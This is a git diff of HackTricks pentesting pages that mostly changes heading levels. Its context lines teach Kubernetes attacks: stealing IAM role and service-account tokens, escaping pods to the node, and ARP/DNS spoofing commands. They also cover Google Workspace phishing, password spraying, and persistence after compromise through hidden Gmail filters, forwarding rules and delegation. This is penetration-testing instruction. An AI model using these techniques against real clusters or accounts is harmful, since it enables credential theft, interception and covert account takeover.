#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
```
-## Privileged only
+# Privileged only
diff --git a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md b/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md
index 8837c72f..670d4f72 100644
--- a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md
+++ b/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Kubernetes Access to other Clouds
-
-## GCP
+# GCP
If you are running a k8s cluster inside GCP you will probably want that some application running inside the cluster has some access to GCP. There are 2 common ways of doing that:
-### Mounting GCP-SA keys as secret
+## Mounting GCP-SA keys as secret
A common way to give **access to a kubernetes application to GCP** is to:
@@ -37,7 +35,7 @@ A common way to give **access to a kubernetes application to GCP** is to:
Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials.
{% endhint %}
-### GKE Workload Identity
+## GKE Workload Identity
With Workload Identity, we can configure a[ Kubernetes service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) to act as a[ Google service account](https://cloud.google.com/iam/docs/understanding-service-accounts). Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.
@@ -87,9 +85,9 @@ for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -
done | grep -B 1 "gcp-service-account"
```
-## AWS
+# AWS
-### Kiam & Kube2IAM (IAM role for Pods)
+## Kiam & Kube2IAM (IAM role for Pods)
An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://github.com/uswitch/kiam) or a [**Kube2IAM**](https://github.com/jtblin/kube2iam) **server.** Basically you will need to run a **daemonset** in your cluster with a **kind of privileged IAM role**. This daemonset will be the one that will give access to IAM roles to the pods that need it.
@@ -134,7 +132,7 @@ metadata:
As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles).
{% endhint %}
-#### Create Pod with IAM Role
+### Create Pod with IAM Role
{% hint style="info" %}
The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it.
@@ -156,7 +154,7 @@ spec:
args: ["-c", "sleep 100000"]' | kubectl apply -f -
```
-### Workflow of IAM role for Service Accounts via OIDC
+## Workflow of IAM role for Service Accounts via OIDC
This is the recommended way by AWS.
@@ -183,7 +181,7 @@ Moreover, if you are inside a pod, check for env variables like **AWS\_ROLE\_ARN
{% endhint %}
-### Find Pods a SAs with IAM Roles in the Cluster
+## Find Pods a SAs with IAM Roles in the Cluster
This is a script to easily **iterate over the all the pods and sas** definitions **looking** for that **annotation**:
@@ -204,7 +202,7 @@ for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -
done | grep -B 1 "amazonaws.com"
```
-### Node IAM Role
+## Node IAM Role
The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_).
@@ -214,7 +212,7 @@ There is however an important requirement to access the metadata endpoint from t
kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}'
```
-### Steal IAM Role Token
+## Steal IAM Role Token
Previously we have discussed how to **attach IAM Roles to Pods** or even how to **escape to the Node to steal the IAM Role** the instance has attached to it.
@@ -231,7 +229,7 @@ if [ "$IAM_ROLE_NAME" ]; then
fi
```
-## References
+# References
* [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)
* [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)
diff --git a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md
index 8e15082e..c832471f 100644
--- a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md
+++ b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Kubernetes Enumeration
-
-## Kubernetes Tokens
+# Kubernetes Tokens
If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**.
@@ -27,7 +25,7 @@ In this folder you might find config files with **tokens and configurations to c
If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env:
-### Service Account Tokens
+## Service Account Tokens
Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.**
@@ -62,15 +60,15 @@ Default location on **Minikube**:
* /var/lib/localkube/certs
-### Hot Pods
+## Hot Pods
_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.
-## RBAC
+# RBAC
If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac).
-## Enumeration CheatSheet
+# Enumeration CheatSheet
In order to enumerate a K8s environment you need a couple of this:
@@ -82,7 +80,7 @@ With those details you can **enumerate kubernetes**. If the **API** for some rea
However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.
-### Differences between `list` and `get` verbs
+## Differences between `list` and `get` verbs
With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API:
@@ -115,7 +113,7 @@ They open a streaming connection that returns you the full manifest of a Deploym
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
{% endhint %}
-### Using curl
+## Using curl
From inside a pod you can use several env variables:
@@ -128,7 +126,7 @@ export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
```
-### Using kubectl
+## Using kubectl
Having the token and the address of the API server you use kubectl or curl to access it as indicated here:
@@ -140,7 +138,7 @@ You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/doc
To find the HTTP request that `kubectl` sends you can use the parameter `-v=8`
-### Current Configuration
+## Current Configuration
{% tabs %}
{% tab title="Kubectl" %}
@@ -169,7 +167,7 @@ kubectl config set-credentials USER_NAME \
--auth-provider-arg=id-token=( your id_token )
```
-### Get Supported Resources
+## Get Supported Resources
With this info you will know all the services you can list
@@ -182,7 +180,7 @@ k api-resources --namespaced=false #Resources NOT specific to a namespace
{% endtab %}
{% endtabs %}
-### Get Current Privileges
+## Get Current Privileges
{% tabs %}
{% tab title="kubectl" %}
@@ -217,7 +215,7 @@ You can learn more about **Kubernetes RBAC** in
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %}
-### Get Others roles
+## Get Others roles
{% tabs %}
{% tab title="kubectl" %}
@@ -235,7 +233,7 @@ kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clu
{% endtab %}
{% endtabs %}
-### Get namespaces
+## Get namespaces
Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
@@ -253,7 +251,7 @@ kurl -k -v https://$APISERVER/api/v1/namespaces/
{% endtab %}
{% endtabs %}
-### Get secrets
+## Get secrets
{% tabs %}
{% tab title="kubectl" %}
@@ -278,7 +276,7 @@ If you can read secrets you can use the following lines to get the privileges re
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
```
-### Get Service Accounts
+## Get Service Accounts
As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges.
@@ -296,7 +294,7 @@ curl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
{% endtab %}
{% endtabs %}
-### Get Deployments
+## Get Deployments
The deployments specify the **components** that need to be **run**.
@@ -315,7 +313,7 @@ curl -v https://$APISERVER/api/v1/namespaces//deployments/
{% endtab %}
{% endtabs %}
-### Get Pods
+## Get Pods
The Pods are the actual **containers** that will **run**.
@@ -334,7 +332,7 @@ curl -v https://$APISERVER/api/v1/namespaces//pods/
{% endtab %}
{% endtabs %}
-### Get Services
+## Get Services
Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
@@ -353,7 +351,7 @@ curl -v https://$APISERVER/api/v1/namespaces/default/services/
{% endtab %}
{% endtabs %}
-### Get nodes
+## Get nodes
Get all the **nodes configured inside the cluster**.
@@ -371,7 +369,7 @@ curl -v https://$APISERVER/api/v1/nodes/
{% endtab %}
{% endtabs %}
-### Get DaemonSets
+## Get DaemonSets
**DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed.
@@ -389,7 +387,7 @@ curl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
{% endtab %}
{% endtabs %}
-### Get cronjob
+## Get cronjob
Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action.
@@ -407,7 +405,7 @@ curl -v https://$APISERVER/apis/batch/v1beta1/namespaces//cronjobs
{% endtab %}
{% endtabs %}
-### Get "all"
+## Get "all"
{% tabs %}
{% tab title="kubectl" %}
@@ -417,7 +415,7 @@ k get all
{% endtab %}
{% endtabs %}
-### **Get Pods consumptions**
+## **Get Pods consumptions**
{% tabs %}
{% tab title="kubectl" %}
@@ -427,7 +425,7 @@ k top pod --all-namespaces
{% endtab %}
{% endtabs %}
-### Escaping from the pod
+## Escaping from the pod
If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
@@ -482,7 +480,7 @@ chroot /root /bin/bash
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
-## References
+# References
{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}
diff --git a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md b/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md
index d6d24c11..20168411 100644
--- a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md
+++ b/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Kubernetes Network Attacks
-
-## Introduction
+# Introduction
Kubernetes by default **connects** all the **containers running in the same node** (even if they belong to different namespaces) down to **Layer 2** (ethernet). This allows a malicious containers to perform an [**ARP spoofing attack**](../../pentesting/pentesting-network/#arp-spoofing) to the containers on the same node and capture their traffic.
@@ -113,11 +111,11 @@ kubectl exec -it ubuntu-victim -n kube-system -- bash -c "apt update; apt instal
kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash"
```
-## Basic Kubernetes Networking
+# Basic Kubernetes Networking
If you want more details about the networking topics introduced here, go to the references.
-### ARP
+## ARP
Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
@@ -129,7 +127,7 @@ This fact implies that, by default, **every pod running in the same node** is go
Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.**
{% endhint %}
-### DNS
+## DNS
In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace:
@@ -179,11 +177,11 @@ Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is g
Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses.
{% endhint %}
-## ARP Spoofing in pods in the same Node
+# ARP Spoofing in pods in the same Node
Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**.
-### Scapy
+## Scapy
```bash
python3 /tmp/arp_spoof.py
@@ -255,14 +253,14 @@ if __name__=="__main__":
```
{% endcode %}
-### ARPSpoof
+## ARPSpoof
```bash
apt install dsniff
arpspoof -t 172.17.0.9 172.17.0.10
```
-## DNS Spoofing
+# DNS Spoofing
As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**.
@@ -299,7 +297,7 @@ If you try to create your own DNS spoofing script, if you **just modify the the
You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction).
{% endhint %}
-## References
+# References
* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
* [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
diff --git a/cloud-security/pentesting-kubernetes/namespace-escalation.md b/cloud-security/pentesting-kubernetes/namespace-escalation.md
index 74b734fa..b348c408 100644
--- a/cloud-security/pentesting-kubernetes/namespace-escalation.md
+++ b/cloud-security/pentesting-kubernetes/namespace-escalation.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Namespace Escalation
-
In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
Here are some techniques you can try to escape to a different namespace:
-### Abuse K8s privileges
+## Abuse K8s privileges
Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
@@ -33,7 +31,7 @@ For more info about which privileges you can abuse read:
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %}
-### Escape to the node
+## Escape to the node
If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:
diff --git a/cloud-security/workspace-security.md b/cloud-security/workspace-security.md
index ef961821..dc5128a8 100644
--- a/cloud-security/workspace-security.md
+++ b/cloud-security/workspace-security.md
@@ -17,31 +17,29 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Workspace Security
+# Workspace Phishing
-## Workspace Phishing
-
-### Generic Phishing Methodology
+## Generic Phishing Methodology
{% content-ref url="../phishing-methodology/" %}
[phishing-methodology](../phishing-methodology/)
{% endcontent-ref %}
-### Google Groups Phishing
+## Google Groups Phishing
Apparently by default in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will looks **legit** and people might click on the link.
-### Hangout Phishing
+## Hangout Phishing
You might be able either to directly talk with a person just having his email address or sending an invitation to talk. Either way, modify an email account maybe naming it "Google Security" and adding some Google logos, and the people will think they are talking to google: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s)
Just the **same technique** can be used with **Google Chat**.
-### Google Doc Phishing
+## Google Doc Phishing
You can create an **apparently legitimate document** and the in a comment **mention some email (like +user@gmail.com)**. Google will **send an email to that email address** notifying that he was mentioned in the document. You can **put a link in that document** to try to make the persona access it.
-### Google Calendar Phishing
+## Google Calendar Phishing
You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event looks legit and **put a comment indicating that they need to read something** (with the **phishing link**).\
To make it looks less suspicious:
@@ -50,17 +48,17 @@ To make it looks less suspicious:
* Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
* Apparently using the API you can set to **True** that **people** has **accepted** the event and even create **comments on their behalf**.
-### OAuth Phishing
+## OAuth Phishing
Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trust** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and from Workspace admins can even prevent people to accept OAuth applications. More on this in the OAuth section.
-## Password Spraying
+# Password Spraying
In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you can use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) who will use AWS lambdas to change IP address.
-## Oauth Apps
+# Oauth Apps
**Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP...
@@ -69,7 +67,7 @@ When a **user** wants to **use** that **application**, he will be **prompted** t
This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. Therefore, in organizations accounts, there are ways to prevent this from happening.
-### Unverified App prompt
+## Unverified App prompt
As it was mentioned, google will always present a **prompt to the user to accept** the permissions he is giving the application on his behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making more difficult** to the user to grant the permissions to the app.
@@ -78,14 +76,14 @@ This prompt appears in apps that:
* Uses any scope that can access to private data (Gmail, Drive, GCP, BigQuery...)
* Apps with less than 100 users (apps > 100 a review process is needed also to not show the unverified prompt)
-### Interesting Scopes
+## Interesting Scopes
You can [**find here**](https://developers.google.com/identity/protocols/oauth2/scopes) a list of all the Google OAuth scopes.
* **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
* **directory.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
-## App Scripts
+# App Scripts
Developers can create App Scripts and set them as a standalone project or bound them to Google Docs/Sheets/Slides/Forms. App Scripts is code that will be triggered when a user with editor permission access the doc (and after accepting the OAuth prompt)
@@ -94,7 +92,7 @@ However, even if the app isn't verified there are a couple of ways to not show t
* If the publisher of the app is in the same Workspace as the user accessing it
* If the script is in a drive of the user
-### Copy Document Unverified Prompt Bypass
+## Copy Document Unverified Prompt Bypass
When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document.**
@@ -111,7 +109,7 @@ But can be prevented with:
.png>)
-### Shared Document Unverified Prompt Bypass
+## Shared Document Unverified Prompt Bypass
Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
@@ -126,45 +124,45 @@ This also means that if an **App Script already existed** and people has **grant
To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `![]()
` tags.
{% endhint %}
-## Post-Exploitation
+# Post-Exploitation
-### Google Groups Privesc
+## Google Groups Privesc
By default in workspace a **group** can be **freely accessed** by any member of the organization.\
Workspace also allow to **grant permission to groups** (even GCP permissions), so if groups can be joined and they have extra permissions, an attacker may **abuse that path to escalate privileges**.
You potentially need access to the console to join groups that allow to be joined by anyone in the org. Check groups information in [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups).
-### Privesc to GCP Summary
+## Privesc to GCP Summary
* Abusing the **google groups privesc** you might be able to escalate to a group with some kind of privileged access to GCP
* Abusing **OAuth applications** you might be able to impersonate users and access to GCP on their behalf
-### Access Groups Mail info
+## Access Groups Mail info
If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**.
-### Takeout - Download Everything Google Knows about an account
+## Takeout - Download Everything Google Knows about an account
If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)
-### Vault - Download all the Workspace data of users
+## Vault - Download all the Workspace data of users
If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**.
-### Contacts download
+## Contacts download
From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es\&tab=mC) you can download all the **contacts** of the user.
-### Cloudsearch
+## Cloudsearch
In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) you can just search **through all the Workspace content** (email, drive, sites...) a user has access to. Ideal to **find quickly sensitive information**.
-### Currents
+## Currents
In [**https://currents.google.com/**](https://currents.google.com) you can access a Google **Chat**, so you might find sensitive information in there.
-### Google Drive Mining
+## Google Drive Mining
When **sharing** a document yo can **specify** the **people** that can access it one by one, **share** it with your **entire company** (**or** with some specific **groups**) by **generating a link**.
@@ -177,28 +175,28 @@ Some proposed ways to find all the documents:
* Search in internal chat, forums...
* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)
-### **Keep Notes**
+## **Keep Notes**
In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here.
-### Persistence inside a Google account
+## Persistence inside a Google account
If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) and **regenerate the 2FA backup codes** to know that even if the user change the password you **will be able to access his account**. Another option **instead** of **regenerating** the codes is to **enrol your own authenticator** app in the 2FA.
-### Persistence via OAuth Apps
+## Persistence via OAuth Apps
If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can configure to **disallow external and/or internal OAuth apps** without being reviewed.\
It is pretty common to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**.
-### Persistence via delegation
+## Persistence via delegation
You can just **delegate the account** to a different account controlled by the attacker.
-### Persistence via Android App
+## Persistence via Android App
If you have a **session inside victims google account** you can browse to the **Play Store** and **install** a **malware** you have already uploaded it directly **in the phone** to maintain persistence and access the victims phone.
-### **Persistence via Gmail**
+## **Persistence via Gmail**
* You can create **filters to hide** security notifications from Google
* from: (no-reply@accounts.google.com) "Security Alert"
@@ -207,19 +205,19 @@ If you have a **session inside victims google account** you can browse to the **
* Create a forwarding address to send emails that contains the word "password" for example
* Add **recovery email/phone under attackers control**
-### **Persistence via** App Scripts
+## **Persistence via** App Scripts
You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**.
The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **scope** `script.scriptapp`, but **apparently thats not necessary** as long as you have declare some other scope.
-### **Administrate Workspace**
+## **Administrate Workspace**
In [**https://admin.google.com**/](https://admin.google.com), if you have enough permissions you might be able to modify settings in the Workspace of the whole organization.
You can also search emails through all the users invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)
-## Account Compromised Recovery
+# Account Compromised Recovery
* Log out of all sessions
* Change user password
@@ -233,7 +231,7 @@ You can also search emails through all the users invoices in [**https://admin.go
* Remove bad Android Apps
* Remove bad account delegations
-## References
+# References
* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
diff --git a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md
index 6f657d65..eb703561 100644
--- a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md
+++ b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# INE Courses and eLearnSecurity Certifications Reviews
+# eLearnSecurity Mobile Application Penetration Tester (eMAPT) and the respective INE courses
-## eLearnSecurity Mobile Application Penetration Tester (eMAPT) and the respective INE courses
-
-### Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)
+## Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)
This is the course to **prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as OS, how the **applications works**, the **most sensitive components** of the Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in the real life**.
@@ -30,7 +28,7 @@ I found the course to be a great one for **people that don't have any experience
Finally, note **two more things** about this course: It has **great labs to practice** what you learn, however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue as **it teach you the basics to be able to understand other Android vulnerabilities**.\
Besides, once you have completed the course (or before) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-apps-pentesting/android-app-pentesting/) and learn more tricks.
-### Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)
+## Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)
When I performed this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to perform the course don't miss the opportunity.** As the previous course, this course will teach you the **basics of iOS**, how the **iOS** **applications works**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications.\
However, there is a very important difference with the Android course, if you want to follow the labs, I would recommend you to **get a jailbroken iOS or pay for some good iOS emulator.**
@@ -38,7 +36,7 @@ However, there is a very important difference with the Android course, if you wa
As in the previous course, this course has some very useful labs to practice what you learn, but it doesn't explain every possible vulnerability of iOS applications. However, that's not an issue as **it teach you the basics to be able to understand other iOS vulnerabilities**.\
Besides, once you have completed the course (or before) you can go to the [**Hacktricks iOS Applications pentesting section**](../mobile-apps-pentesting/ios-pentesting/) and learn more tricks.
-### [eMAPT](https://elearnsecurity.com/product/emapt-certification/)
+## [eMAPT](https://elearnsecurity.com/product/emapt-certification/)
> The eLearnSecurity Mobile Application Penetration Tester (eMAPT) certification is issued to cyber security experts that display advanced mobile application security knowledge through a scenario-based exam.
@@ -50,16 +48,16 @@ Having done the [**INE course about Android applications pentesting**](https://m
In this exam I **missed the opportunity to exploit more vulnerabilities**, however, **I lost a bit the "fear" to write Android applications to exploit a vulnerability**. So it felt just like **another part of the course to complete your knowledge in Android applications pentesting**.
-## eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the INE course related
+# eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the INE course related
-### Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)
+## Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)
This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \
Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities.
I think this course **isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did.
-### [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/)
+## [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/)
> The eLearnSecurity Web Application Penetration Tester eXtreme (eWAPTX) is our most advanced web application pentesting certification. The eWPTX exam requires students to perform an expert-level penetration test that is then assessed by INE’s cyber security instructors. Students are expected to provide a complete report of their findings as they would in the corporate sector in order to pass.
@@ -68,24 +66,24 @@ The exam was composed of a **few web applications full of vulnerabilities**. In
**All the vulnerabilities I reported could be found explained in the** [**Web Application Penetration Testing eXtreme course**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**.** However, order to pass this exam I think that you **don't only need to know about web vulnerabilities**, but you need to be **experienced exploiting them**. So, if you are doing the course, at least practice with the labs and potentially play with other platform where you can improve your skills exploiting web vulnerabilities.
-## Course: **Data Science on the Google Cloud Platform**
+# Course: **Data Science on the Google Cloud Platform**
\
It's a very interesting basic course about **how to use the ML environment provided by Google** using services such as big-query (to store al load results), Google Deep Learning APIs (Google Vision API, Google Speech API, Google Natural Language API and Google Video Intelligence API) and even how to train your own model.
